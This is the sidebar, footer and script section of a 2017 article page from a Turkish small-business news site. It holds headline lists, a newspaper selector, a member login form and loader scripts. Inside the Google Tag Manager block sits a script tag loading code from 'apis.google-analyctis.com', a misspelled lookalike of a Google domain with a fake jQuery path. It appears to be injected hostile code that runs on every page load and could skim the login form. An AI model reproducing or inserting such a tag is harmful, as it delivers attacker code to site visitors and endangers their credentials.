                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/sigara-ile-ilgili-guncel-bilgiler-makale,379.html" title="Gülsemin Güloğlu" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/gulsemin_guloglu_1.jpg" alt="Gülsemin Güloğlu" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/sigara-ile-ilgili-guncel-bilgiler-makale,379.html" title="Gülsemin Güloğlu" >Gülsemin Güloğlu</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/sigara-ile-ilgili-guncel-bilgiler-makale,379.html" title="Sigara ile ilgili güncel bilgiler" >Sigara ile ilgili güncel bilgiler</a></p>
                    </div>
                  </div>
                                                </div>
            </div>
            <div class="header">
                <h5><a href="http://www.kobi-efor.com.tr/yazarlar-alinti.html" title="Konuk Yazarlar Arşivi">Konuk Yazarlar Arşivi</a></h5>
           <!--     <a class="control left" href="#" id="ayprev"></a>
                <a class="control right" href="#" id="aynext"></a> -->
              </div>
            </div>
                                                

                      <!-- ENCOKLAR  -->
            <div class="encoklar">
              <div class="accordion">
                              <div class="accordion-group">
                  <div class="accordion-heading">
                    <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
                    <h5><i class="halflings-icon white fire"></i> En Çok Okunan Haberler</h5></a>
                  </div>
                  <div id="collapseOne" class="accordion-body collapse in">
                    <div class="accordion-inner">
                      <ul>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/xiii-kobi-zirvesi-25-mayis-ta-istanbul-da-endustriyel-donusumle-gelecegin-kobileri-h6273.html" title="XIII. KOBİ Zirvesi 25 Mayıs&#039;ta İstanbul&#039;da: &#039;Endüstriyel Dönüşümle Geleceğin KOBİ&#039;leri”" ><!--b>1.</b--> XIII. KOBİ Zirvesi 25 Mayıs&#039;ta İstanbul&#039;da: “Endüstriyel Dönüşümle Geleceğin KOBİ’leri”</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/nurdan-sonmez-cumhurbaskanlari-oturumu-bir-yol-ayriminda-olan-insanlik-h6287.html" title="Nurdan Sönmez: Cumhurbaşkanları Oturumu; &#039;Bir Yol Ayrımında Olan İnsanlık”" ><!--b>2.</b--> Nurdan Sönmez: Cumhurbaşkanları Oturumu; “Bir Yol Ayrımında Olan İnsanlık”</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/firma-tanitim/dunyanin-en-buyuk-is-platformu-bni-hem-is-cevrenizi-hem-isinizi-buyutuyor-h6278.html" title="Dünyanın en büyük iş platformu BNI, hem iş çevrenizi hem işinizi büyütüyor" ><!--b>3.</b--> Dünyanın en büyük iş platformu BNI, hem iş çevrenizi hem işinizi büyütüyor</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/kapak/20-avrasya-ekonomi-zirvesi-istanbulda-yapildi-h6271.html" title="20. Avrasya Ekonomi Zirvesi, İstanbul&#039;da yapıldı" ><!--b>4.</b--> 20. Avrasya Ekonomi Zirvesi, İstanbul’da yapıldı</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/destek-tesvik/destek-ve-tesvik-programlari-h6310.html" title="Destek ve Teşvik programları" ><!--b>5.</b--> Destek ve Teşvik programları</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/osb-tanitim/gosb-teknopark-tan-sanayi-camiasina-rekabet-dopingi-h6275.html" title="GOSB Teknopark&#039;tan sanayi camiasına rekabet dopingi" ><!--b>6.</b--> GOSB Teknopark&#039;tan sanayi camiasına rekabet dopingi</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/osbuk-38-osb-temsilcisini-gebze-guzeller-osbde-bulusturdu-h6274.html" title="OSBÜK, 38 OSB temsilcisini Gebze Güzeller OSB&#039;de buluşturdu" ><!--b>7.</b--> OSBÜK, 38 OSB temsilcisini Gebze Güzeller OSB’de buluşturdu</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/kocaelide-osb-baskanlari-ile-bir-araya-gelen-bakan-faruk-ozlu-ekonominin-lokomotifi-sanayi-sanayinin-lokomotifi-kocaeli-h6276.html" title="Kocaeli&#039;de OSB Başkanları ile bir araya gelen Bakan Faruk Özlü; &#039;Ekonominin lokomotifi sanayi, sanayinin lokomotifi Kocaeli”" ><!--b>8.</b--> Kocaeli’de OSB Başkanları ile bir araya gelen Bakan Faruk Özlü; “Ekonominin lokomotifi sanayi, sanayinin lokomotifi Kocaeli”</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/firma-tanitim/gebze-de-globale-uzanan-yolda-gumusay-grup-sirketleri-hizla-buyuyor-h6281.html" title="Gebze&#039;de globale uzanan yolda; Gümüşay Grup şirketleri hızla büyüyor" ><!--b>9.</b--> Gebze&#039;de globale uzanan yolda; Gümüşay Grup şirketleri hızla büyüyor</a></li>
                                                <li class="last"><a href="http://www.kobi-efor.com.tr/ayin-konugu/tesvikli-bingolden-cagri-var-potansiyel-var-yatirima-gel-h6272.html" title="Teşvikli Bingöl&#039;den çağrı var; &#039;Potansiyel var yatırıma gel”" ><!--b>10.</b--> Teşvikli Bingöl’den çağrı var; “Potansiyel var yatırıma gel”</a></li>
                                              </ul>
                    </div>
                  </div>
                </div>
                                            <div class="accordion-group">
                  <div class="accordion-heading">
                    <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
                      <h5><i class="halflings-icon white comments"></i> En Çok Yorumlanan Haberler</h5></a>
                  </div>
                  <div id="collapseTwo" class="accordion-body collapse in">
                    <div class="accordion-inner">
                      <ul>
                                                  <li class="last"><a href="http://www.kobi-efor.com.tr/-h.html" title="" ><!--b>1.</b--> </a></li>
                                              </ul>
                    </div>
                  </div>
                </div>
                            </div>
            </div>
            
                                          <!-- newspaper -->
                   <div class="newspaper">
                        <div class="header">
                          <h5>Gazete Manşetleri</h5>
                        </div>
                        <div class="content">
          		    <select name="gazete" onChange="gazete_goster(this.value)" style="width:280px">
          			<option value="">-- Gazete Seçiniz --</option>
          				          					<option value="hurriyet_2017-05-18">Hürriyet</option>
          				          					<option value="milliyet_2017-05-18">Milliyet</option>
          				          					<option value="sabah_2017-05-18">Sabah</option>
          				          					<option value="posta_2017-05-18">Posta</option>
          				          					<option value="vatan_2017-05-18">Vatan</option>
          				          					<option value="zaman_2017-05-18">Zaman</option>
          				          					<option value="cumhuriyet_2017-05-18">Cumhuriyet</option>
          				          					<option value="taraf_2017-05-18">Taraf</option>
          				          					<option value="haberturk_2017-05-18">Haber Türk</option>
          				          					<option value="yeni-safak_2017-05-18">Yeni Şafak</option>
          				          					<option value="star_2017-05-18">Star</option>
          				          					<option value="aksam_2017-05-18">Akşam</option>
          				          					<option value="turkiye_2017-05-18">Türkiye</option>
          				          					<option value="bugun_2017-05-18">Bugün</option>
          				          					<option value="takvim_2017-05-18">Takvim</option>
          				          					<option value="gunluk-evrensel_2017-05-18">Evrensel</option>
          				          					<option value="aydinlik_2017-05-18">Aydınlık</option>
          				          					<option value="milli-gazete_2017-05-18">Milli Gazete</option>
          				          					<option value="ortadogu_2017-05-18">Ortadoğu</option>
          				          					<option value="gunes_2017-05-18">Güneş</option>
          				          					<option value="sozcu_2017-05-18">Sözcü</option>
          				          					<option value="yurt_2017-05-18">Yurt</option>
          				          					<option value="yeni-akit_2017-05-18">Yeni Akit</option>
          				          					<option value="yeniasya_2017-05-18">Yeni Asya</option>
          				          					<option value="milat_2017-05-18">Milat</option>
          				          					<option value="fanatik_2017-05-18">Fanatik</option>
          				          					<option value="fotomac_2017-05-18">Foto Maç</option>
          				          					<option value="dunya_2017-05-18">Dünya</option>
          				          		    </select>
                        </div>
                      </div>
                  <!-- newspaper -->
          	                                    <!--
                                                                                                <!-- REKLAM-58  -->
            <div class="reklam"><div class="fb-page" data-href="https://www.facebook.com/kobiefor" data-width="300" data-height="600" data-small-header="true" data-adapt-container-width="true" data-hide-cover="true" data-show-facepile="true" data-show-posts="true"><div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/kobiefor"><a href="https://www.facebook.com/kobiefor">KobiEfor Dergisi</a></blockquote></div></div></div>
                        
	                <!-- SON YORUMLAR -->
            <div class="sayfalar">
              <div class="header">
                <h5>Son Yorumlar</h5>
              </div>
              <div class="content">
                <ul class="unstyled">
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/lojistik/proje-tasimaciligi-h3125.html#comment_97" title="" >Merhabalar haber kaynağı ile ilgili kaynakça...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/yasam/insan-kaynaklari/metro-kurumsal-iletisim-muduru-bilge-ceylan-h3616.html#comment_94" title="" >Bilge hanim - saygilar, adim NAMIK Ayvalik...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/haber/turkiye-mukemmellik-odul-toreni-17-18-kasimda-istanbulda-h4667.html#comment_92" title="" >Mersin Büyükşehir Belediyesi çalışanları...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/pazarulke/kobilerimiz-kuzey-afrikada-kolay-tutunur-cezayir-tunus-fas-h5441.html#comment_90" title="" >27 şubat - 02 mart 2017 50. fia international...</a></li>
                                    <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/kultur-sanat-moda/nacardan-sportif-tasarimlar-h4243.html#comment_89" title="" >Çok güzel benim kocam kullanıyor</a></li>
                                  </ul>
              </div>
            </div>
            

                                                                                                    </div>
              </div>
            </div>
                      </div>
        </div>
      </div>
      <div class="footer">
        <div class="container center">
          <!-- FOOTER -->
<div id="linkler" class="row-fluid">
  </div>
		<!--div class="btn-group dropup">
  			<button class="btn">Hızlı Menü</button>
  			<button class="btn dropdown-toggle" data-toggle="dropdown">
    			<span class="caret"></span>
  			</button>
			<ul class="dropdown-menu">
        		<li><a href="#"><i class="icon-file"></i> Künye</a></li>
				<li class="divider"></li>
        		<li><a href="#"><i class="icon-plus"></i> Sitene Ekle</a></li>
        		<li><a href="#"><i class="icon-thumbs-up"></i> Reklam Ver</a></li>
        		<li><a href="#"><i class="icon-envelope"></i> İletişim Formu</a></li>
    		</ul>
		</div-->
    <hr>
  <div id="footer-alt" class="row-fluid">
  <div class="span2">
    <a href="http://www.kobi-efor.com.tr/" class="logo"><img src="http://www.kobi-efor.com.tr/images/banner/kobiefor_altbolge.png" alt="‘Metro Gıda Hareketi’ başladı" /></a>
  </div>
  <div class="span10">
    <ul class="unstyled">
      <li><a href="http://www.kobi-efor.com.tr/kunye.html"><i class="halflings-icon link"></i> Künye</a></li>
      <li><a href="http://www.kobi-efor.com.tr/anketler.html"><i class="halflings-icon check"></i> Anketler</a></li>
      <li><a href="http://www.kobi-efor.com.tr/roportajlar.html"><i class="halflings-icon tags"></i> Röportajlar</a></li>
      <li><a href="http://www.kobi-efor.com.tr/astroloji"><i class="halflings-icon globe"></i> Astroloji</a></li>
      <li><a href="http://www.kobi-efor.com.tr/sitene-ekle.html"><i class="halflings-icon plus-sign"></i> Sitene Ekle</a></li>
      <li><a href="http://www.kobi-efor.com.tr/iletisim.html"><i class="halflings-icon usd"></i> Reklam Ver</a></li>
      <li><a href="http://www.kobi-efor.com.tr/iletisim.html"><i class="halflings-icon envelope"></i> İletişim Formu</a></li>
    </ul>
        <p>&copy; 2017 - Sitemizde yayınlanan haberlerin telif hakları haber kaynaklarına aittir. İzin alınmadan kopyalanamaz.</p>
        <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim">TE Bilişim</a></p>
  </div>
  </div>
<!-- FOOTER ***************************************************** -->        </div>
        <div id="top" class="btn btn-inverse">Yukarı Çık</div>
      </div>
      <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="http://www.kobi-efor.com.tr/index.php?m=login" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="http://www.kobi-efor.com.tr/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="http://www.kobi-efor.com.tr/sifremi-unuttum.html" class="pull-left btn">Şifremi Unuttum</a>
    <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>



   
  <div class="reklam dikey sol" > 
                                                  </div>
    <div class="reklam dikey sag ortala">
                  <p><a href="http://www.kobi-efor.com.tr/banner.php?id=193" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/thumb.php?src=http://www.kobi-efor.com.tr/images/banner/crown-plaza.jpg&w=160&h=600&q=90" width="160" height="600" style="width:160px;height: 600px;border:0" alt="banner193" /></a></p>                                                                                                                                                                    </div>



	
                    


<script src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/login.js"></script>
<script src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/yepnope.1.5.4-min.js"></script>
<script>
	yepnope({
		load: [
			'https://code.jquery.com/jquery-1.9.1.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.cookie.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.mousewheel.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.scrollbar.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.cycle.lite.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/base.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/hs.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/waypoints.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/sticky.min.js',
						,'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/comments.js'									,'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/system.js',

		],



		complete : function(){  
		      
			$(function(){  
				$.getScript('http://platform.twitter.com/widgets.js');
				$.getScript('http://www.google-analytics.com/ga.js');
																

				if (typeof (FB) != 'undefined') {
					FB.init({ status: true, cookie: true, xfbml: true });
				} else {
					$.getScript("http://connect.facebook.net/tr_TR/all.js#xfbml=1", function () {
						FB.init({ status: true, cookie: true, xfbml: true });
					});
				}

				if (typeof (gapi) != 'undefined') {
					gbuttons.each(function () {
						gapi.plusone.render($(this).get(0));
					});
				} else {
					$.getScript('https://apis.google.com/js/plusone.js');
				}


			});
			


   			hs.graphicsDir = 'http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/hs/';
   			
			$.getJSON(site_url + 'cache/static/twitter_followers.json',function(data) { 
				$('a#followers').html(data);
			});

			var graph_url = 'https://graph.facebook.com/'+facebook_user;
			$.getJSON(graph_url, function(data) {
			  $('a#likes').html(data.likes);
			});


			

			$('.sticky-menu').waypoint('sticky', {
				wrapper: '<div class="sticky-wrapper" />',
				stuckClass: 'stuck'
			});

							$('body').append($("<div class='popup hiding' id='article-finished'></div>"));
				$("#article-finished").html("").append($("#ilgilihaberler2"));


				$('.footer').waypoint(function(direction) {
				  $('#article-finished').toggleClass('hiding', direction === "up");
				}, {
				  offset: function() {
				    return $.waypoints('viewportHeight') - $(this).height() + 500;
				  }
				});
			

			


			



			




			


			
			
						

   
		 }  




	});

</script>


    <!-- Google Tag Manager -->
<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-W3SBKW"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-W3SBKW');</script>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script>
<!-- End Google Tag Manager -->    


           


    <div id="fb-root"></div>
        <script type="text/javascript">
      var fbTitle  = encodeURIComponent("‘Metro Gıda Hareketi&#039; başladı");
      var fbUrl    = encodeURIComponent(location.href);
      var fbThumb  = "http://www.kobi-efor.com.tr/images/haberler/thumbs/metro_gida_hareketi_basladi_h6374_9dd00.jpg";
      var fbDesc   = encodeURIComponent("Türkiye&#039;de her yıl üretilen 49 milyon ton meyve ve sebzenin yüzde 25 ila 40&#039;ı arasında değişen miktarı  üretim ve dağıtım zinciri aşamasında kayba uğruyor.");
    </script> 
    
<div id="ilgilihaberler2">
          <p><a href="http://www.kobi-efor.com.tr/panorama/yeni-nokia-tasarimlariyla-fark-yaratiyor-h6390.html" title="Yeni Nokia tasarımlarıyla fark yaratıyor"><b>Yeni Nokia tasarımlarıyla fark yaratıyor</b>
      <br>Nokia’nın yeni akıllı telefonları Nokia 3, Nokia 5 ve Nokia 6, tasarımlarıyla fark yaratıyor.</a></p>
      <p><a href="http://www.kobi-efor.com.tr/panorama/yeni-nokia-tasarimlariyla-fark-yaratiyor-h6390.html" title="Yeni Nokia tasarımlarıyla fark yaratıyor" class="btn btn-danger btn-small">Haberi Oku</a></p>
    </div>


  </body>
</html>
